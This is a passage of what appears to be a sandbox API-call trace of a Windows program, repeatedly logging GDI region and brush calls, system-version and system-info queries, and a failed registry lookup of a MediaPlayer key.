y2=0) returned 0x1040880 [0087.614] CombineRgn (hrgnDst=0x104087f, hrgnSrc1=0x360401cd, hrgnSrc2=0x340401d0, iMode=1) returned 1 [0087.614] CombineRgn (hrgnDst=0x1040880, hrgnSrc1=0x360401cd, hrgnSrc2=0x340401d0, iMode=4) returned 2 [0087.614] CreateSolidBrush (color=0xff) returned 0x210087e [0087.614] CreateSolidBrush (color=0xff0000) returned 0x1100881 [0087.614] DeleteObject (ho=0x1100881) returned 1 [0087.614] DeleteObject (ho=0x340401d0) returned 1 [0087.614] DeleteObject (ho=0x360401cd) returned 1 [0087.614] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.614] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.614] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.614] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.614] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.614] BeginPath (hdc=0x0) returned 0 [0087.614] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.614] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.614] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.614] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.614] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.614] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.614] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x350401d0 [0087.614] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x370401cd [0087.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040882 [0087.614] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040883 [0087.615] CombineRgn (hrgnDst=0x1040882, hrgnSrc1=0x350401d0, hrgnSrc2=0x370401cd, iMode=1) returned 1 [0087.615] CombineRgn (hrgnDst=0x1040883, hrgnSrc1=0x350401d0, hrgnSrc2=0x370401cd, iMode=4) returned 2 [0087.615] CreateSolidBrush (color=0xff) returned 0x2100881 [0087.615] CreateSolidBrush (color=0xff0000) returned 0x1100884 [0087.615] DeleteObject (ho=0x1100884) returned 1 [0087.615] DeleteObject (ho=0x370401cd) returned 1 [0087.615] DeleteObject (ho=0x350401d0) returned 1 [0087.615] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.615] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.615] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.615] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.615] BeginPath (hdc=0x0) returned 0 [0087.615] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.615] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.615] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.615] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.615] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.615] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.615] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x380401cd [0087.615] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x360401d0 [0087.615] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040885 [0087.615] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040886 [0087.615] CombineRgn (hrgnDst=0x1040885, hrgnSrc1=0x380401cd, hrgnSrc2=0x360401d0, iMode=1) returned 1 [0087.615] CombineRgn (hrgnDst=0x1040886, hrgnSrc1=0x380401cd, hrgnSrc2=0x360401d0, iMode=4) returned 2 [0087.615] CreateSolidBrush (color=0xff) returned 0x2100884 [0087.615] CreateSolidBrush (color=0xff0000) returned 0x1100887 [0087.615] DeleteObject (ho=0x1100887) returned 1 [0087.615] DeleteObject (ho=0x360401d0) returned 1 [0087.615] DeleteObject (ho=0x380401cd) returned 1 [0087.615] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.615] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.615] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.615] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.615] BeginPath (hdc=0x0) returned 0 [0087.615] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.615] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.615] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.615] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.615] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.616] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.616] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.616] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.616] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x370401d0 [0087.616] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x390401cd [0087.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040888 [0087.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040889 [0087.616] CombineRgn (hrgnDst=0x1040888, hrgnSrc1=0x370401d0, hrgnSrc2=0x390401cd, iMode=1) returned 1 [0087.616] CombineRgn (hrgnDst=0x1040889, hrgnSrc1=0x370401d0, hrgnSrc2=0x390401cd, iMode=4) returned 2 [0087.616] CreateSolidBrush (color=0xff) returned 0x2100887 [0087.616] CreateSolidBrush (color=0xff0000) returned 0x110088a [0087.616] DeleteObject (ho=0x110088a) returned 1 [0087.616] DeleteObject (ho=0x390401cd) returned 1 [0087.616] DeleteObject (ho=0x370401d0) returned 1 [0087.616] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.616] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.616] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.616] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.616] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.616] BeginPath (hdc=0x0) returned 0 [0087.616] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.616] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.616] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.616] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.616] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.616] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.616] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.616] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.616] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3a0401cd [0087.616] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x380401d0 [0087.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088b [0087.616] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088c [0087.616] CombineRgn (hrgnDst=0x104088b, hrgnSrc1=0x3a0401cd, hrgnSrc2=0x380401d0, iMode=1) returned 1 [0087.616] CombineRgn (hrgnDst=0x104088c, hrgnSrc1=0x3a0401cd, hrgnSrc2=0x380401d0, iMode=4) returned 2 [0087.616] CreateSolidBrush (color=0xff) returned 0x210088a [0087.616] CreateSolidBrush (color=0xff0000) returned 0x110088d [0087.616] DeleteObject (ho=0x110088d) returned 1 [0087.617] DeleteObject (ho=0x380401d0) returned 1 [0087.617] DeleteObject (ho=0x3a0401cd) returned 1 [0087.617] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.617] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.617] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.617] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.617] BeginPath (hdc=0x0) returned 0 [0087.617] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.617] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.617] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.617] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.617] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.617] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x390401d0 [0087.617] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3b0401cd [0087.617] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088e [0087.617] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104088f [0087.617] CombineRgn (hrgnDst=0x104088e, hrgnSrc1=0x390401d0, hrgnSrc2=0x3b0401cd, iMode=1) returned 1 [0087.617] CombineRgn (hrgnDst=0x104088f, hrgnSrc1=0x390401d0, hrgnSrc2=0x3b0401cd, iMode=4) returned 2 [0087.617] CreateSolidBrush (color=0xff) returned 0x210088d [0087.617] CreateSolidBrush (color=0xff0000) returned 0x1100890 [0087.617] DeleteObject (ho=0x1100890) returned 1 [0087.617] DeleteObject (ho=0x3b0401cd) returned 1 [0087.617] DeleteObject (ho=0x390401d0) returned 1 [0087.617] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.617] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.617] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.617] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.617] BeginPath (hdc=0x0) returned 0 [0087.617] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.617] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.617] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.617] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.617] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.617] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.617] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.618] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3c0401cd [0087.618] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3a0401d0 [0087.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040891 [0087.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040892 [0087.618] CombineRgn (hrgnDst=0x1040891, hrgnSrc1=0x3c0401cd, hrgnSrc2=0x3a0401d0, iMode=1) returned 1 [0087.618] CombineRgn (hrgnDst=0x1040892, hrgnSrc1=0x3c0401cd, hrgnSrc2=0x3a0401d0, iMode=4) returned 2 [0087.618] CreateSolidBrush (color=0xff) returned 0x2100890 [0087.618] CreateSolidBrush (color=0xff0000) returned 0x1100893 [0087.618] DeleteObject (ho=0x1100893) returned 1 [0087.618] DeleteObject (ho=0x3a0401d0) returned 1 [0087.618] DeleteObject (ho=0x3c0401cd) returned 1 [0087.618] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.618] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.618] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.618] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.618] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.618] BeginPath (hdc=0x0) returned 0 [0087.618] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.618] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.618] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.618] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.618] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.618] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.618] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.618] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.618] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3b0401d0 [0087.618] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3d0401cd [0087.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040894 [0087.618] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040895 [0087.618] CombineRgn (hrgnDst=0x1040894, hrgnSrc1=0x3b0401d0, hrgnSrc2=0x3d0401cd, iMode=1) returned 1 [0087.619] CombineRgn (hrgnDst=0x1040895, hrgnSrc1=0x3b0401d0, hrgnSrc2=0x3d0401cd, iMode=4) returned 2 [0087.619] CreateSolidBrush (color=0xff) returned 0x2100893 [0087.619] CreateSolidBrush (color=0xff0000) returned 0x1100896 [0087.619] DeleteObject (ho=0x1100896) returned 1 [0087.619] DeleteObject (ho=0x3d0401cd) returned 1 [0087.619] DeleteObject (ho=0x3b0401d0) returned 1 [0087.619] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.619] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.619] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.619] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.619] BeginPath (hdc=0x0) returned 0 [0087.619] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.619] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.619] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.619] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.619] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.619] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.619] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.619] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3e0401cd [0087.619] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3c0401d0 [0087.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040897 [0087.619] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040898 [0087.619] CombineRgn (hrgnDst=0x1040897, hrgnSrc1=0x3e0401cd, hrgnSrc2=0x3c0401d0, iMode=1) returned 1 [0087.619] CombineRgn (hrgnDst=0x1040898, hrgnSrc1=0x3e0401cd, hrgnSrc2=0x3c0401d0, iMode=4) returned 2 [0087.619] CreateSolidBrush (color=0xff) returned 0x2100896 [0087.619] CreateSolidBrush (color=0xff0000) returned 0x1100899 [0087.619] DeleteObject (ho=0x1100899) returned 1 [0087.619] DeleteObject (ho=0x3c0401d0) returned 1 [0087.619] DeleteObject (ho=0x3e0401cd) returned 1 [0087.619] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.619] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.619] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.619] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.619] BeginPath (hdc=0x0) returned 0 [0087.619] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.619] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.619] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.619] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.620] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.620] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.620] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x3d0401d0 [0087.620] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x3f0401cd [0087.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089a [0087.620] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104089b [0087.620] CombineRgn (hrgnDst=0x104089a, hrgnSrc1=0x3d0401d0, hrgnSrc2=0x3f0401cd, iMode=1) returned 1 [0087.620] CombineRgn (hrgnDst=0x104089b, hrgnSrc1=0x3d0401d0, hrgnSrc2=0x3f0401cd, iMode=4) returned 2 [0087.620] CreateSolidBrush (color=0xff) returned 0x2100899 [0087.620] CreateSolidBrush (color=0xff0000) returned 0x110089c [0087.620] DeleteObject (ho=0x110089c) returned 1 [0087.620] DeleteObject (ho=0x3f0401cd) returned 1 [0087.620] DeleteObject (ho=0x3d0401d0) returned 1 [0087.620] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.620] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, 